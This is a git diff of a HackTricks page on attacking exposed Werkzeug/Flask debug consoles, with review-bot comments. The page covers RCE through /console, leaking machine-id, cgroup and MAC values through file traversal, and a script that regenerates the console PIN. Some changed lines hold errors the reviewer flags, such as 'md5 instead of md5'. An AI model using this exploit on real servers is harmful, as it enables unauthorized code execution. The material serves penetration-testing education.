diff --git a/SUMMARY.md b/SUMMARY.md
index f2a2e2970..710c71b74 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -366,7 +366,7 @@
* [WAF Bypass](network-services-pentesting/pentesting-web/waf-bypass.md)
* [Web API Pentesting](network-services-pentesting/pentesting-web/web-api-pentesting.md)
* [WebDav](network-services-pentesting/pentesting-web/put-method-webdav.md)
- * [werkzeug](network-services-pentesting/pentesting-web/werkzeug.md)
+ * [Werkzeug / Flask Debug](network-services-pentesting/pentesting-web/werkzeug.md)
* [Wordpress](network-services-pentesting/pentesting-web/wordpress.md)
* [XSS to RCE Electron Desktop Apps](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md)
* [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
diff --git a/network-services-pentesting/pentesting-web/werkzeug.md b/network-services-pentesting/pentesting-web/werkzeug.md
index 7347db927..f02531d97 100644
--- a/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/network-services-pentesting/pentesting-web/werkzeug.md
@@ -1,23 +1,18 @@
-
+# Werkzeug / Flask Debug
-HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
+HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-
-# Console RCE
+## Console RCE
If debug is active you could try to access to `/console` and gain RCE.
@@ -29,14 +24,14 @@ __import__('os').popen('whoami').read();
There is also several exploits on the internet like [this ](https://github.com/its-arun/Werkzeug-Debug-RCE)or one in metasploit.
-# Pin Protected
+## Pin Protected
In some occasions the /console endpoint is going to be protected by a pin. Here you can find how to generate this pin:
* [https://www.daehee.com/werkzeug-console-pin-exploit/](https://www.daehee.com/werkzeug-console-pin-exploit/)
* [https://ctftime.org/writeup/17955](https://ctftime.org/writeup/17955)
-## Werkzeug Console PIN Exploit
+### Werkzeug Console PIN Exploit
**Copied from the first link.**\
See Werkzeug βconsole lockedβ message by forcing debug error page in the app.
@@ -49,7 +44,7 @@ shell that runs the server
Locate vulnerable Werkzeug debug console at path `vulnerable-site.com/console`, but is locked by secret PIN number.
-You can reverse the algorithm generating the console PIN. Inspect Werkzeugβs debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. View [Werkzeug source code repo](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\__init\_\_.py), but better to leak source code through file traversal vulnerability since versions likely differ.
+You can reverse the algorithm generating the console PIN. Inspect Werkzeugβs debug `__init__.py` file on server e.g. `python3.5/site-packages/werkzeug/debug/__init__.py`. View [Werkzeug source code repo](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py), but better to leak source code through file traversal vulnerability since versions likely differ.
In this file, see relevant method outlining steps to generate console PIN:
@@ -147,22 +142,74 @@ private_bits = [
]
```
-* `username` is the user who started this Flask
-* `modname` is flask.app
-* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is Flask
-* `getattr(mod, '__file__', None)` is the absolute path of `app.py` in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, try `app.pyc`
-* `uuid.getnode()` is the MAC address of the current computer, `str (uuid.getnode ())` is the decimal expression of the mac address
-* `get_machine_id()` read the value in `/etc/machine-id` or `/proc/sys/kernel/random/boot_id` and return directly if there is, sometimes it might be required to append a piece of information within `/proc/self/cgroup` that you find at the end of the first line (after the third slash)
+#### **`probably_public_bits`**
-To find server MAC address, need to know which network interface is being used to serve the app (e.g. `ens3`). If unknown, leak `/proc/net/arp` for device ID and then leak MAC address at `/sys/class/net//address`.
+* **`username`** is the user who started this Flask
+* **`modname`** is flask.app
+* `getattr(app, '__name__', getattr (app .__ class__, '__name__'))` is **Flask**
+* `getattr(mod, '__file__', None)` is the **absolute path of `app.py`** in the flask directory (e.g. `/usr/local/lib/python3.5/dist-packages/flask/app.py`). If `app.py` doesn't work, **try `app.pyc`**
-Convert from hex address to decimal representation by running in python e.g.:
+#### `private_bits`
+
+* `uuid.getnode()` is the **MAC address of the current computer**, `str(uuid.getnode())` is the decimal expression of the mac address.
+
+ * To **find server MAC address**, need to know which **network interface is being used** to serve the app (e.g. `ens3`). If unknown, **leak `/proc/net/arp`** for device ID and then **leak** MAC address at **`/sys/class/net//address`**.
+
+
+
+ Convert **from hex address to decimal** representation by running in python e.g.:
+
+ ```python
+ # It was 56:00:02:7a:23:ac
+ >>> print(0x5600027a23ac)
+ 94558041547692
+ ```
+* `get_machine_id()` concatenate the **values in `/etc/machine-id` ** , **`/proc/sys/kernel/random/boot_id`** and **first line of `/proc/self/cgroup`** after the last slash (`/`).
+
+
+
+get_machine_id() code
```python
->>> print(0x5600027a23ac)
-94558041547692
+def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
+ global _machine_id
+
+ if _machine_id is not None:
+ return _machine_id
+
+ def _generate() -> t.Optional[t.Union[str, bytes]]:
+ linux = b""
+
+ # machine-id is stable across boots, boot_id is not.
+ for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id":
+ try:
+ with open(filename, "rb") as f:
+ value = f.readline().strip()
+ except OSError:
+ continue
+
+ if value:
+ linux += value
+ break
+
+ # Containers share the same machine id, add some cgroup
+ # information. This is used outside containers too but should be
+ # relatively stable across boots.
+ try:
+ with open("/proc/self/cgroup", "rb") as f:
+ linux += f.readline().strip().rpartition(b"/")[2]
+ except OSError:
+ pass
+
+ if linux:
+ return linux
+
+ # On OS X, use ioreg to get the computer's serial number.
+ try:
```
+
+
Once all variables prepared, run exploit script to generate Werkzeug console PIN:
```python
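Review bot: the new `get_machine_id()` bullet misstates the algorithm shown in the code block directly below it. The loop over `/etc/machine-id` and `/proc/sys/kernel/random/boot_id` does `break` after the first file that yields a non-empty value, so the two are never both used: `boot_id` is only a fallback when `machine-id` is missing or empty, and the `/proc/self/cgroup` suffix is appended to that single value. Suggest: "`get_machine_id()` returns the first non-empty of `/etc/machine-id` and `/proc/sys/kernel/random/boot_id`, followed by the part of the first line of `/proc/self/cgroup` after its last `/`". Smaller points in the same hunk: the markup in `**values in `/etc/machine-id` **` has a space before the closing `**` and will not render as bold; `/sys/class/net//address` is missing the interface placeholder (e.g. `/sys/class/net/<interface>/address`) and was carried over unchanged from the removed text; the heading `#### **`probably_public_bits`**` is bolded while `#### `private_bits`` is not; and the pasted listing ends on a dangling `try:` with a bare `get_machine_id() code` line as its caption, so either close the excerpt at `return linux` or mark the cut with `# ...`. The `t.Optional` annotations also rely on Werkzeug's `import typing as t`, which the excerpt does not show.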
@@ -180,7 +227,8 @@ private_bits = [
'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]
-h = hashlib.md5()
+#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
+h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
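Review bot: the version boundary should be stated in the comment itself rather than only linked: per the referenced changelog the PIN hash moved from MD5 to SHA-1 in Werkzeug 2.0.0, so something like `# Werkzeug < 2.0.0: hashlib.md5(); >= 2.0.0: hashlib.sha1()` tells the reader which line to uncomment without leaving the page. The context line `'d4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id` is also now inconsistent with the `get_machine_id()` description added earlier in this patch, which says the value carries the `/proc/self/cgroup` suffix as well; the comment should describe it as the full `get_machine_id()` output, not just the contents of `/etc/machine-id`.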
@@ -210,22 +258,18 @@ if rv is None:
print(rv)
```
-If you are on a new version of Werkzeug, try changing the hashing algorithm to sha1 instead of md5.
+{% hint style="success" %}
+If you are on an **old version** of Werkzeug, try changing the **hashing algorithm to md5** instead of md5.
+{% endhint %}
-HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
+HackTricks in π¦ Twitter π¦ - ποΈ Twitch Wed - 18.30(UTC) ποΈ - π₯ Youtube π₯
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
-
-
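Review bot: the new hint contradicts itself: "try changing the **hashing algorithm to md5** instead of md5" should read "to md5 instead of sha1", since the script above now defaults to `hashlib.sha1()` and it is the pre-2.0.0 releases that used MD5. The rewritten hint also inverts the removed sentence's direction (old text: new version, switch to sha1; new text: old version, switch to md5), which is the right call given the default change, but the hash name has to match.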